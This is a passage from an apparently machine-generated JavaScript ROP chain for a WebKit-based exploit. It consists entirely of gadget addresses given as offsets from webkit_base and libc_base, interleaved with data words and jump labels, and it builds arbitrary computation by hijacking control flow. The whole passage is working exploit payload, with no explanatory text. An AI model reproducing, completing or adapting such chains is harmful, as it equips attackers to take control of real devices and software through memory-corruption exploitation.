webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256288, //L4728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4726:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4727:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4728:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4729:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+256360, //L4731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4731:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+256488, //L4733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+256504, //L4734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256472, //L4732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4732:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4733:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4734:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+256600, //L4736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+256584, //L4735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4735:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4736:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+256680, //L4737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4737:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4739:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+256800, //L4742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256784, //L4740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4740:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4742:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+256944, //L4745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256912, //L4743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+256928, //L4744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4743:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4744:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4745:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257016, //L4747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4747:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257072, //L4748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4748:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257152, //L4750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4752:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+257272, //L4755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+257256, //L4753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+257416, //L4758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+257384, //L4756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+257400, //L4757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4756:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4757:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4758:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+257504, //L4760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4759:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4760:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+257560, //L4761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4761:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4763:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+257640, //L4765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4765:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257744, //L4766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+257760, //L4767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4766:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4767:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+257848, //L4769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+257904, //L4770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+257976, //L4773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4773:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+258032, //L4774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4774:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4717:
//L4659:
//L4505:
libc_base+764760, //pop rsi
ropchain+258120, //L4776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4776:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4778:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+258240, //L4781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258224, //L4779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4779:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4781:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+258384, //L4784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258352, //L4782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+258368, //L4783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4782:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4783:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4784:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+258480, //L4786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4785:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4786:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4787:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+258584, //L4788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258600, //L4789
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4788:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4789:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+258776, //L4791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258792, //L4792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+258760, //L4790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4790:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4791:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4792:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+258904, //L4794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+258952, //L4797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+258920, //L4795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4794:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4795:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4796:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4797:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+259064, //L4798+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+259056, //L4798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4798:
db([0, 0]); // 0x0
set_gadgets([
ropchain+259080, //L4798+24
ropchain+261088, //L4793
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259120, //L4799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4799:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4800:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L4801:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+259312, //L4805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+259280, //L4803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259296, //L4804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4802:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4803:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4804:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+259368, //L4807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4807:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+259496, //L4809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+259512, //L4810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259480, //L4808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4808:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4809:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4810:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+259608, //L4812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+259592, //L4811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4811:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4812:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+259688, //L4813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4813:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4815:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+259808, //L4818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259792, //L4816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4816:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4818:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+259952, //L4821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+259920, //L4819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+259936, //L4820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4820:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4821:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260024, //L4823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4823:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260080, //L4824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4824:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260160, //L4826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4826:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4828:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+260280, //L4831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+260264, //L4829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4829:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4831:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+260424, //L4834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+260392, //L4832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+260408, //L4833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4832:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4833:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4834:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+260512, //L4836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4835:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4836:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+260568, //L4837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4837:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4839:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+260648, //L4841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4841:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260752, //L4842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+260768, //L4843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4842:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4843:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+260856, //L4845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4845:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+260912, //L4846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4846:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+260984, //L4849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4849:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+261040, //L4850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4850:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4793:
//L4111:
libc_base+764760, //pop rsi
ropchain+261128, //L4852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4852:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4854:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+261248, //L4857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261232, //L4855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4855:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4857:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+261392, //L4860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261360, //L4858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+261376, //L4859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4858:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4859:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+261488, //L4862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4861:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4863:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+261592, //L4864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261608, //L4865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4864:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4865:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+261784, //L4867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261800, //L4868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+261768, //L4866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4866:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4867:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4868:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+261912, //L4870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+261960, //L4873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+261928, //L4871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4870:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4871:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4872:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4873:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+262072, //L4874+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+262064, //L4874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4874:
db([0, 0]); // 0x0
set_gadgets([
ropchain+262088, //L4874+24
ropchain+271584, //L4869
libc_base+764760, //pop rsi
ropchain+262128, //L4875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4875:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4877:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
